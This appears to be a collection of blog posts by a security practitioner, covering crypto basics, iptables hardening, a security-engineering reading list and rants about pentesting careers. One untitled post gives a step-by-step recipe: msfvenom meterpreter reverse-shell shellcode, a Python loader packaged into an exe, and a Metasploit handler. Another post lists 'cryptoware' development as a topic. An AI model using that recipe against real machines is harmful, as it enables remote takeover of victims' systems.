Cryptography and Symmetric Key Algorithms
cmdjunkie
Crypto is typically considered the most difficult aspect of information security.  At the same time, it's fair to say it's the most important -- especially in today's world.  In this blog I will explore the specifics of crypto basics and attempt to break them down into core principles and concepts so they are easy to digest.

All crypto relies on algorithms, and these algorithms dictate how the enciphering and deciphering processes take place.  Kerckhoffs' principle states that a cryptosystem should remain secure even if everything about it, except the key, is public knowledge.  It's essentially an open-source concept: the encryption algorithms are widely available so anyone can examine and test them, and the security of the system rests entirely on keeping the encryption/decryption key secret.

Moving on: to fully understand cryptography, you need the basics of binary math and logical operations.  Binary math is essentially boolean math.  We're used to the base-10 decimal system, where each digit is an integer from 0 through 9; that system likely has biological origins, since humans have 10 fingers to count on.  In binary math, and ultimately in computer science, on (1) is true and off (0) is false.

Logical operations consist of the boolean operators AND, OR, NOT, and XOR (each sketched in Python right after the list):

  • AND, represented by the ^ symbol, checks to see whether two values are both true

  • OR, represented by the \/ symbol, checks to see whether at least one value is true

  • NOT, represented by - or !, simply reverses the value.  "0 is NOT 1.  1 is NOT 0."

  • XOR, represented by a circle with a plus sign in it (⊕), returns true when only one input value is true.  "If both are false, or both are true, the output is false."
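
These map directly onto Python's bitwise operators if you want to poke at them yourself (a quick illustrative sketch, nothing more):

  >>> 1 & 1, 1 & 0            # AND: true only when both inputs are true
  (1, 0)
  >>> 1 | 0, 0 | 0            # OR: true when at least one input is true
  (1, 0)
  >>> 1 ^ 1, 1 ^ 0            # XOR: true only when exactly one input is true
  (0, 1)
  >>> int(not 1), int(not 0)  # NOT: simply reverses the value
  (0, 1)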

Modulo functions and modulo math simply give you the remainder value left over after a division operation is performed.

  • 8 mod 6 = 2

  • 6 mod 8 = 6

  • 10 mod 3 = 1

  • 10 mod 2 = 0

  • 32 mod 8 = 0

Pretty easy, right?
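
In Python, for example, this is just the % operator (a one-liner to sanity-check the list above):

  >>> 8 % 6, 6 % 8, 10 % 3, 10 % 2, 32 % 8
  (2, 6, 1, 0, 0)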

One-way functions are mathematical operations that easily produce an output value for every possible combination of inputs, but make it computationally infeasible to recover the input values from that output.  It's like having a huge number like 10,718,488,075,259 and trying to figure out which three prime numbers were multiplied together to produce it.  In this example, the huge number is the product of three primes: 17,093; 22,441; and 27,943.
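
Here's a rough way to feel that asymmetry in Python (a toy sketch -- real one-way functions use numbers vastly larger than this, where trial division becomes hopeless):

  >>> 17093 * 22441 * 27943        # the easy direction: multiply
  10718488075259
  >>> n, f = 10718488075259, 2
  >>> while n % f: f += 1          # the hard direction: grind until a factor falls out
  ...
  >>> f, n // f
  (17093, 627068863)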

A nonce is a random number that acts as a placeholder variable in mathematical functions.  It's like having a variable in the middle of your algorithm that changes each time the algorithm is executed.  A common attack on wireless communications is to capture as many packets containing initialization vectors (IVs) as you can in order to reconstruct the WEP key.  IVs are nonces in the sense that they are supposed to change every time they are used.  Unfortunately, WEP had no requirement that keys change over time or that different stations use different keys, so the same IVs would be bouncing around a wireless network at all times.  Not only that, but WEP IVs were only 24 bits long.  This was largely a consequence of U.S. export restrictions on strong cryptography at the time, which effectively capped the original key size at 64 bits.  This is why WEP keys were 40 bits and their IVs were 24.

The IV attack on WEP was pretty simple.  Because IVs weren't encrypted in transmission, attackers would generate a lot of traffic on a WEP network to produce millions of packets carrying IVs.  Those IVs were then stripped out of the captured traffic and compared across packets, and as duplicate IVs turned up, the key could gradually be recovered.
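
The underlying weakness is easy to demonstrate.  If two packets are ever encrypted with the same keystream -- which a repeated 24-bit IV guarantees on a busy network -- XORing the two ciphertexts cancels the keystream and leaks the XOR of the plaintexts.  A toy Python sketch of that reuse problem (the core idea only, not the actual WEP key-recovery attack):

  >>> import os
  >>> keystream = os.urandom(16)                       # stand-in for the per-packet RC4 keystream
  >>> xor = lambda a, b: bytes(x ^ y for x, y in zip(a, b))
  >>> p1, p2 = b"attack at dawn!!", b"retreat at noon!"
  >>> c1, c2 = xor(p1, keystream), xor(p2, keystream)  # two packets, same keystream
  >>> xor(c1, c2) == xor(p1, p2)                       # the keystream cancels out entirely
  True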


Vocabulary
Private Key Cryptosystems:  all participants in the cryptosystem use a shared key.
Public Key Cryptosystems: all participants use their own pair of keys (one public, one private)
Cryptography: the art of creating and implementing secret codes and ciphers
Cryptanalysis:  the study of methods to defeat codes and ciphers
Cryptology:  the combination of both cryptography and cryptanalysis


Next Up: Transposition Ciphers, Substitution Ciphers, Block, Stream, and Running Key Ciphers

Linux Server Security: Shutting Down Services
cmdjunkie
---------------- IPTables Crash Course   ----------------------------

It's critical to have an understanding of how to use IPTables, especially in a CTF/Competitive scenario.  Here are a couple of tips and tricks that go a long way:

List current running iptables rules:
$ iptables -L -v

Appending a new rule to iptables:
$ iptables -A INPUT -p tcp --dport 80 -j ACCEPT
   # This rule allows incoming connections on TCP port 80

Deleting the second rule in iptables:
$ iptables -D INPUT 2
This requires that you know the rule's position in the chain.  Rules are read top to bottom; in this case, it's the second rule in the INPUT chain.

Dump all rules (handy for backups or for reviewing the full ruleset):
$ iptables-save

Make rules persistent (by default they're gone after a reboot).  On Debian-based systems like Kali, one common approach is the iptables-persistent package, or simply:
$ iptables-save > /etc/iptables/rules.v4

You can also insert a rule or replace a rule by specifying a number next to the chain you're modifying.  But let's get back to work.

***************** Demo ****************

To demo this technique, I'm using a Kali box, and a Windows system with nmap.  On the kali box, my iptables configuration looks like this:




I'm going to fire up a Python HTTPServer (e.g. python -m SimpleHTTPServer 2121) and scan it to show what it looks like from an attacker's perspective:



Because there are no rules in place, the open Python server port, 2121, is easily discovered.  Once you apply a REJECT rule with tcp-reset (something like: iptables -A INPUT -p tcp --dport 2121 -j REJECT --reject-with tcp-reset), it should disappear.



There you have it, MWL: iptables will render your server and its services inaccessible.  Hit me up if you have questions.

I'll do one on port knocking soon.  

SSE Biblioteca
cmdjunkie
Recently I've been doing some deep thinking on what exactly a security software engineer is.  I read through my past couple of posts, and while I've gone on rants about how I want to forge my own path that sits between security, pentesting, and software engineering, I can honestly say that there's no real definitive curriculum that determines what one should focus on to acquire the skills of a security software engineer.

I see the sub-discipline as a technical collection of knowledge that's based on software engineering principles but focused on security concepts, design, and implementation.  To me, security isn't about management, or remediation, or even penetration testing -- or at least it shouldn't be.  It should be about implementing defensible systems from the ground up.  Too often, software vulnerabilities are baked into software solutions because developers and programmers aren't necessarily testing their software as they should.  They're also not building secure, defensible facets into their solutions, because in the development world, delivery is more important than security.

Well let the architects, application developers and programmers have their roles.  The goal is not to replace them, it's to supplement the SDLC process with proven defensible, fault-tolerant, high-integrity components.  It's more than just hacking.  It's more than just pentesting.  I don't believe pentesters add any real value to dev teams or enterprises as a whole.  Security Software Engineers are to be well versed in a variety of computer science disciplines, only they specialize in ensuring confidentiality, integrity, and availability through implementation.

With that being said, I've put together a list of texts and references that should be absolute required reading for a programmer wishing to pursue the sub-discipline of Security Software Engineering.  I'd like to include specific texts, but I feel as though there are a variety of texts out there that each have their pros and cons.  What I propose is a series of guidelines to assist the aspiring Security Software Engineer in accumulating their own collection of SSE references and resources.

Get yourself a book that focuses on:

  • building secure software and secure software practices.

  • operating systems design and implementation

  • computer networking design and architecture

  • TCP/IP sockets and their practical use

  • SSL and TLS encryption design and implementation

  • compiler design / x86 architecture

  • a good algorithm book

  • databases, their design, implementation and management

  • software testing and exploitation

  • penetration testing tools, techniques and procedures

  • linux forensics and incident response

  • windows forensics and incident response

That's pretty much it.  I want to keep it as generic as possible because it should be up to the SSE to determine what programming language they want to use.  The goal is not to learn how to implement something in a specific language or on a specific platform, it's to understand security software engineering well enough to adapt to whatever systems, platforms, or languages development teams use.

One might wonder why I didn't include a code-review guideline, and that's because it's too specific to have as a requirement.  Building secure software and secure software practices should equip the SSE with models that can adapt to any language.  Also, despite my distaste for penetration testing, I included it because it's a necessary aspect of SSE.  I just don't think it should stand on its own as a discipline that a career is based on.

I also think it's important for an SSE to have a solid understanding of, and the ability to read, a variety of languages.  In fact, I would say it's important that an SSE expose themselves to a variety of languages at the junior college level, as junior college programming classes are ideal when it comes to language familiarity.  They won't delve too much into theory or deep problem solving, but they'll equip an SSE with the ability to apply SSE principles in a multitude of languages on a multitude of platforms.

In fact, I would even go so far as to say that an SSE program should start out as a curriculum that teaches practical programming in a multitude of languages.  This would ensure students are practical practitioners instead of heady consumers of conceptual theory.  I support this position based on the fact that security software engineering is straightforward and not necessarily rooted in applied mathematics.  Security Software Engineering isn't about efficiency, it's about applied confidentiality, integrity, and availability.  It's in essence taking the CISSP and turning it into practical implementations.

SSE Practical Course Requirements

  • C++: Level I

  • C#: Level I

  • C# Level II

  • Java Programming: Level I

  • Java Programming: Level II

  • Android Mobile Programming

  • Intro to Local Area Networks

  • Introduction to Javascripting

  • MYSQL Database

  • Object Oriented Analysis / Design

  • Survey Computer Information Systems

  • Project Management: MS Project (Windows)

  • College Algebra/Functions

  • Intermediate Algebra

  • Linux Operating System

SSE Conceptual Reading Requirements

  • Building Secure Software: How to Avoid Security Problems the Right Way

  • TCP/IP Sockets in Java: Practical Guide for Programmers

  • Operating Systems Design and Implementation

  • Computer Networks (International Economy Edition)

  • Exploiting Software: How to Break Code

  • SSL and TLS: Designing and Building Secure Systems

  • Crafting a Compiler with C

  • Intel Microprocessors - Pentium Pro Processor Architecture

  • Nine Algorithms that Changed the Future

  • Database Systems: Design, Implementation & Management

SSE Operational Security Reading Requirements

  • Mastering Metasploit: Second Edition

  • NMAP Network Scanning

  • Windows Forensic Analysis

  • Linux Forensics

  • The Tao of Network Security Monitoring

  • Extrusion Detection

Personally, I like to get the real books because I like turning pages and reading from paper.  But by all means, if you can power through reading the conceptual and operational requirements via e-reader or pdf, go for it.  

Swiffer DFIR and Self-Identification
cmdjunkie
I've been patiently waiting for the arrival of a new book I ordered on Amazon: Linux Server Security: Hack and Defend.  Every day for the last couple of days I hit up my mailbox and look for that notification that there's a package in the main office.  That little bugger was supposed to be here yesterday.  But I digress.

My newfound clarity as of late has me harping on quantifiable progress by way of effort and time invested -- it is because of this that I have such an issue with penetration testing and enterprise security operations.  In a nutshell, I like to not only see progress, but to be able to identify irrefutable successes and victories in whatever work is being performed.  I'm sure a lot of this perspective stems from the recent frustrations I've had at work.  I simply can't get behind efforts that are meaningless in the long run.  It's this fundamental principle that has me questioning everything I've worked towards with regard to offensive security, and ultimately my role in the security operations department at my job.

So, full disclosure: my entire security career was initially based on my interest in security and not necessarily on legitimate qualifications.  But here's the rub: what exactly are legitimate qualifications?  Back in 2006, apparently all you had to have was an interest and maybe a 2-year tech degree (like yours truly).  That's what got me in the door, and for close to 10 years I worked as some type of security [analyst | engineer | admin], eventually and recently landing roles as a penetration tester.  BUT FUCK.... what does all of that mean?  What are security skills anyway?  The fact that security is not based on an underlying systematic discipline where testable explanations and predictions can be made (like a legitimate science) means that most efforts put forth in the name of security are just tests, guesses, or trial-and-error scenarios where real progress cannot be measured.  In a nutshell, the work is unforgiving, never-ending, and impossible to measure in terms of success.  You can't win.... or can you?

Pentesting and security operations share this trait of unquantifiable success.  Sure, if you can compromise a system or network during a penetration testing engagement, you can go home (or back to the hotel) happy that you're a badass and you pwned some hapless administrator's network.  But what are you really doing to improve security, or your client's security for that matter?  You're basically just showing that you spend too much time playing with tools and honing a skillset that is ever-so-fleeting in its relevancy.  It's juvenile, and pointless in the grand scheme of things.  A penetration test is more or less worthless because a dedicated attacker will always find a way in; real attackers don't have a scope or an engagement window.  So what exactly are pentesters actually selling?  "We'll break in before the skiddies do", which is good enough for most companies, right?  After all, they're not really interested in the security of their network.  They're just trying to check a regulatory compliance box so they don't get dinged come audit season.

Security operations primarily deals with vulnerabilities and the remediation of those vulnerabilities.  There's often some risk aspect baked into the reporting, but hell, vulnerability management is basically counting grains of sand at the beach.  Risk-based reporting is rooted in some variation (emphasis on the word variation) of the risk formula:

Risk = (Impact * Probability) / Cost
OR
Risk = Threats * Vulnerabilities * Impact
OR
<Insert dickface security practitioner's custom risk formula here>

There's no real science behind "security operations".  It's just people spinning their wheels, looking at spreadsheets, generating charts and graphs, putting in remediation plans, arguing about remediation windows or reasons why something can't be fixed, or if something should be fixed, or its real impact on whatever is believed to be the most sensitive aspect of an enterprise or private data network.  Yak yak yak bla bla bla.

--

Real, quantifiable security has to be based on a science, a domain where limits and metrics can be baselined, tested, and compared.  But I'm not really concerned with that.  I want to get away from that as much as I possibly can.  This is why there's a phenomenon called infosec burnout.  It's the byproduct of individuals working in this field who can't ever seem to get ahead and make enough significant progress to generate some level of satisfaction in the work that they do.  You see, without a quantifiable measurement of success, one can never really know how good they are.  This is my problem with security, and it always has been.  When it comes to the work I've done over the last 12 years, I can't say for sure if I'm good at what I do.  I can scan, scrape, metasploit, exfil, infiltrate, crack, hack, and sniff with the best of them, but what are those skills really worth unless you're using them for bad, and not good?  If given a target and a goal (and a down payment) without a scope or engagement window, I can do some damage.  But that type of work is hard to come by (right now at least -- corporate espionage, anyone?).  In the enterprise, sure, I've held positions that had me watching the network, but I'm a robot, and all it takes is for Jamie in HR to download some ActiveX plugin to ruin my week.  You can't win.

But I tell you what... programming and development is not the same.  As a programmer, you're on the outside looking in.  Your job is to satisfy customer requirements -- whoever that customer may be.  And lo and behold, security software development is on the rise.  This is the panacea of security work, as it sits on the outside and is rooted in software engineering concepts and principles.  Security software developers DO security; they aren't responsible for it.  If a network gets breached and data is compromised, it's on the security team, not the developers that wrote the software.  That's because developers haven't traditionally been responsible for the defensibility of their solutions -- until now.  The logic behind security software development and engineering is straightforward: "the communications link between these two components is insecure"... implement strong encryption.  "This entry field is not adequately validated, and unexpected behavior can result from various inputs"... improve input validation and exception handling, ensuring only XYZ data will be processed.  It doesn't get any more straightforward than that.

Systems analysis for incident response can also be improved by software engineering principles -- in essence, designing solutions that can logically analyze a system for indicators of compromise.  Systems and software are predictable -- people aren't.  This is the fundamental problem with bullshit security operations and offensive security: they rely on the impossible task of predicting human behavior.  It can't be done.

I want to stay away from security work that is based around behavior prediction.  System security is fine by me.  Software security is also fine by me.  Security software, its research and development, is fine by me.  Anything else is just uncivilized.

Now, where's my Linux security book??

But for now...
cmdjunkie
At this point I should be hitting the hay, but hey, I don't necessarily have to wake up at a specific time tomorrow, so fuck it.

I'm still on the fence about whether or not I should drop the grand on the GPYC cert.  Earlier this week on a team meeting call, I asked my boss if there was any opportunity to get reimbursed for training costs and the like.  He said he would look into it -- just like he says about everything else, but never does anything.  Typical.  I can't expect my job to pay for my training or certifications, as I don't believe they genuinely care about their employees.  It doesn't matter though.  I've been making some very significant moves in the last couple of months, and ultimately I'm just trying to set myself up for my move to San Diego.  Ah yes, the end is near.  So long, barren desert wasteland.

I'm shutting down my virtual lab -- for now.  I hardly ever use it anymore because I'm just fucking tired of security bullshit.  Have I mentioned that in a previous post?  I think so.  The system that houses my virtual lab is a powerhouse, and I'm not necessarily putting it to good use.  Tomorrow morning I think I'll push all the code I wrote on those Kali instances to my GitHub account and do some spring cleaning.

I can't help but see this disgust I have for pentesting and security as a... dare I say... sign of maturity?  Hahaha, me, mature?  Yeah right.  But it's quite possible.  I just don't have it in me to continue to peck and hunt for ways to break shit.  Who the fuck cares.  The skillset is juvenile and worthless -- even if you're making money off of it by security contracting.  I've been there and I've done that, and it kinda sticks in my craw that I'm selling a false sense of security to my clients.  How valuable is a week-long penetration test anyway?  What's the real value in it?  It just shows that a moderately skilled attacker couldn't break into your systems in 40-60 hours.  Whoopty doo.  A real attacker doesn't have engagement windows.

But there's a sense of badass-ness and dangerousness associated with self-identifying as a hacker.  That's probably the draw (and the stay).  But hey, in Trump's America, that type of mentality will get you labeled a terrorist.  Who needs that kind of attention?  Not me.

Apathy Sets In...
cmdjunkie
I just got off a call with my boss, my boss's boss, my boss's boss's boss, and my boss's boss's boss's boss (the CIO).  They had questions about the results of an engagement I performed late last year and early into this year.  I had no idea this meeting was going to be held this morning; in fact, I was on my way back from getting coffee from Starbucks when my boss called me up telling me that the call was going on with everyone on it and that there were MAJOR discrepancies between the data discovered and the data they already had.

Normally, this type of call would rub me the wrong way, but not this time.  I've gotten to the point where I just simply don't care anymore.  When I got on the call and they started asking me questions, I basically told them that I'm not surprised there were discrepancies in the data because I was forced to expedite the delivery of the findings before the analysis was completed.  No one can argue with that because it's the fucking truth.  I sat on the call, silent and attentive, listening to these imbeciles aggressively make their statements about what's real and factual, and what can and cannot be proven.

When this "project" came up last october, I had no idea it was as urgent and as serious as it eventually turned out to be.  I thought it would be a fun exercise to get to know the network, produce some maps, and discover some EOL systems.  Little did I know it would have as much visibility as it did, run up the chain of command, and have me defending everything I did.  The fact of the matter is, if the IT department was ran with an inkling of information technology/security competancy, I wouldn't have had to waste as much time I did on the engagement itself.  They left it up to me to ultimately highlight the fact that we don't have an inventory system or a reliable method of identifying and decomissioning systems that are out of date.  Yes, they left it up to the scrappy hacker to nail down data that probably gets reported to some regulatory body -- which I'm okay with, but my actions are hardly full encompassing of the entire network.  There's no way I covered all of the enterprise network so I'm sure there were gaps and network ranges I didn't assess.  I had to put together the network ranges to assess myself.  What did they expect?

The reason I'm not really fazed by this is that I'm kind of sick of security operations -- and ultimately of working for someone else.  I think it's interesting that security found me, because I never really intended on making a career out of infosec.  I found it just like everyone else did, only I was a programmer who had a significant level of knowledge and interest before infosec blew up the way it did.  Information security is a joke to me -- in the sense of working for a company in the security department.  There's so much about it that makes me cringe, I'm surprised I've been in this field for as long as I have.

As I went to bed last night, it dawned on me that I've been focusing on the wrong things for the longest time.  For all intents and purposes I've been at this professional hacker chase for 11 years (2006).  I know some things, and I can do some things, but where and what does that really get you?  I've spent so much time in front of my systems, tinkering with tools, setting up VM's and attacking them, and I just find myself asking why?  What's the point?

Having been around for as long as I have, I've learned that people are just wired differently -- and roles in technology-related fields are no different.  There's a reason why certain people gravitate towards different aspects of technology: it's because that's the way they're wired.  Network guys go into networking because they like technology, but they're not inventive.  As far as security folk go, auditors and CISSPy types aren't firing up Kali, and pentesters aren't going to go line by line through a massive workbook to validate PCI compliance -- they just aren't wired that way.  There's even a discernible difference between coders, developers, and engineers, but they're more or less wired the same way from a 500 ft. view (please excuse my use of business jargon here).  The point is, it makes sense to capitalize on your innate abilities and talents and steer your skillset and career in that direction.

Anyway, I'm adamant about making a complete shift to coding and development -- specifically security-related coding and development.  I want nothing to do with the operational aspects of information security.  The field has too many problems that stem from ambiguity and subjectivity.  I've said it before and I'll say it again: there's no science behind information security work, and it's so saturated with FUD (fear, uncertainty, and doubt) that the decision makers have no idea how to manage a team successfully.  I know where I want to be, and that's on the engineering/development side of security.  You can't argue with an application or solution that addresses requirements -- if it works, then it works.

I genuinely hate the idea that I've spent / continue to spend as much time as I do on ridiculous security work when I could be building something.  The problem with security, as I've pointed out so many times before, is the fact that (time spent != improved security || reduction of risk), and that's bogus.  Security skills are also fleeting, so while you may spend a significant amount of time learning new tools, techniques, and exploits, tomorrow they may be worthless, and the only thing gleaned from the time spent learning may be the concept you were attempting to apply.  How valuable is that?

I stand by my position that programming and development, as well as the concepts and theory behind software engineering, are still the most valuable, sought-after, and defensible skillsets one can have in the industry.  I think this way because I'd like to believe that once you're exposed to the underlying core theories and concepts of computation, all other aspects can be easily picked up.  This isn't necessarily true, because it takes a tech junkie to really step outside of their comfort zone of, say, OOP and data structures and delve into security and/or WAN technologies.  It just doesn't happen often.

I've found myself constantly at odds and feeling like an outsider in my places of employment over the years.  Too many times I found myself in a (security) role that was adversarial to development teams (or network teams).  It's interesting because I think like a programmer, so I relate to the developers, but my job was to limit their access or tell them they couldn't do one thing or another.  Too many times I was lumped in with the networking team, or the tie-wearing GRC/Risk team, because of my role, when in fact I should've been hunkered down in the back room with the pickle-crunching developers, writing code and optimizing solutions.

It's because of this that I want to leave operational security behind.  There's no way I could ever get away from my interest in information security; I just can't fathom it being my job anymore.  The politics that surround information security, especially in the enterprise, are too much for me to concern myself with.  They get in the way of actual work and reduce the satisfaction of -- dare I say -- creative security solutions and workarounds that actually improve the technical security posture of daily workflow.  No one sees this, because information security is a thankless profession.

It's for the reasons above that I have every intention of forging my own path, that path being security software engineering.  Like I said, I'll never be able to get away from my experience and undying interest in security.  But the truth is you can't really DO security.  It's not a verb.  I made the correlation before that security is akin to grammar.  You can't do grammar.  You implement grammatical concepts to ensure what you're writing is fully understood.  Everyone should know and understand grammatical concepts -- basics like the use of a period, or capitalizing the first letter of a sentence.

Anyway, I want to DO and BUILD security, and not remain on the surface of its operations by reporting on findings, or risk levels, or remediation efforts.  I suppose the reason that type of work exists and is tolerated is that those who fill those roles aren't engineers or don't have the capacity for coding and development.

Security Economics
cmdjunkie
Considering:
https://pentestmag.com/product/practical-fuzzing-for-pentesters-w34/

Automating Whitebox Testing:
http://www.slideshare.net/NetSPI/fuzzing-and-you-automating-whitebox-testing

Black Markets and Bug Bounties
https://www.engadget.com/2017/02/04/dark-net-black-markets-bug-bounty-programs/

Applied Adversarial Software Development (AASD)

  • Developing Cryptoware

  • Developing C2C Clients and Servers

  • Advanced Discovery and Enumeration Applications


I find that security and accounting (as well as finance/economics) share a lot of the same core principles.  For example, in accounting/finance there's a concept called the Time Value of Money, whereby money in hand today is worth more than a larger amount in the future.  In security, this concept can be applied to exploits/POCs, where a less advanced POC today is worth more than a more polished exploit/POC in the future.
Time Value of Money (TVM)
Time Value of Exploitation/POC???
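
A rough sketch of the analogy in Python (my own back-of-the-napkin framing, not an established model): discount the future value of an exploit the same way you'd discount future cash, where the "rate" stands in for patch cycles, detection signatures, and disclosure risk.

  >>> def present_value(future_value, rate, periods):
  ...     return future_value / (1 + rate) ** periods
  ...
  >>> present_value(1000, 0.10, 0)            # a working POC in hand today
  1000.0
  >>> round(present_value(1000, 0.10, 2), 2)  # a better exploit, but two "periods" out
  826.45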

Mobile App Idea
cmdjunkie
Develop an application that queues up security videos and podcasts for easy consumption in the car or on the go.

Application name undecided.

(no subject)
cmdjunkie
Generate a meterpreter payload:
Grab that pyshell: http://pastebin.com/rrhcGeHh
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 -a x86 -f c
> c:\python27\python.exe ..\pyinstaller.py pyshell.py --onefile
OR
> c:\python27\python.exe ..\pyinstaller.py -w -a -F pyshell.py
# run multi-handler
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit


Procedural Recap:
1] Use a python script that loads shellcode into memory and executes it.  Have this handy.
2] Generate meterpreter shellcode with the appropriate IP (or any other shellcode you want to use) and replace the shellcode in the script.
3] Convert the newly edited script to an exe.
4] Run the multi-handler and execute the exe on the target machine.
5] Execute post-ex procedures (including but not limited to UPPR)

Rants Gantts and Elephants
cmdjunkie
The problem with the information security industry is the lack of accountability combined with the lack of technical know-how.  More specifically, software companies need to be held accountable for their shitty products and those that are working to "protect organizations" need to be held to higher technical standards.

Over the last couple of years, some of my friends have found their way into the field, and while I'm not one to harp on the success of others, it reminds me of why companies and private networks are insecure in the first place.  Having a couple of certifications doesn't mean you know how to protect a network, or that you can identify an IoC when it's necessary.  Granted, they have to start somewhere, but the truth is, they're not in it for the craft, they're in it for the cash.

I really can't stand hearing "I can't code" or "I'm not about that life" when it comes to coding, pentesting, or the intricacies of DFIR.  I tell some of my friends that to be good (and to be taken seriously) you really have to live it and love it.  It's not a 9-5 job, it's 24/7.  It's late nights, devouring books, watching a lot of videos, a lot of note taking, testing, setting up VMs, programs, and exploits, and maintaining an organized model to work with it all.  Programming is the same way, but programming differs from security in that the time dedicated to a build more often than not has a positive output.  In security, time worked/invested != progress.  Often, security work is like beating your head against your keyboard until something happens.  Programming/dev is like being a writer: you just have to sit down and do it.  Security isn't like that.  It's wide, deep, and requires a top-down approach to learn anything new and worthwhile.

I know a lot of "security pro's" who seriously cannot code --and it drives me nuts because all I can think about is the fact that vulnerabilities are based on software flaws.  In security, the age old addage is "Think bad, do good", which is basically an excuse to cash in on the growing demand for offensive skills.  In security, the hacks are taught before anything, in hopes that a practitioner will understand how to detect/defend having learned the attack.  Well, where is this mentality when it comes to security software engineering?

I've been saying it for years: a security software engineering sub-field will be in high demand in the coming years, because companies are going to want security professionals who can break AND build.  Unfortunately, the inevitability of the field is that automation WILL eliminate most of the well-paying, in-demand jobs of today.  By 2020, pentesting will be completely automated, as will detection and prevention software that learns and adapts to network traffic and behavior.  This is just the natural progression of the industry, and it's going to leave a lot of "security pros" behind.  Sure, one can rack up security certifications, but what does that really mean?  I know a nice collection of security pros who have a laundry list of certifications but couldn't write a simple HTTP fuzzer if their life depended on it.

Security had a good run over the last 10 years as a young industry that had a lot of growing up to do.  For a while there, anyone could get in, make a good living, and cash in on the growing demand for security skills.  Fortunately, the industry is growing up and the real engineers are stepping in to make some significant changes to our established expectations.  
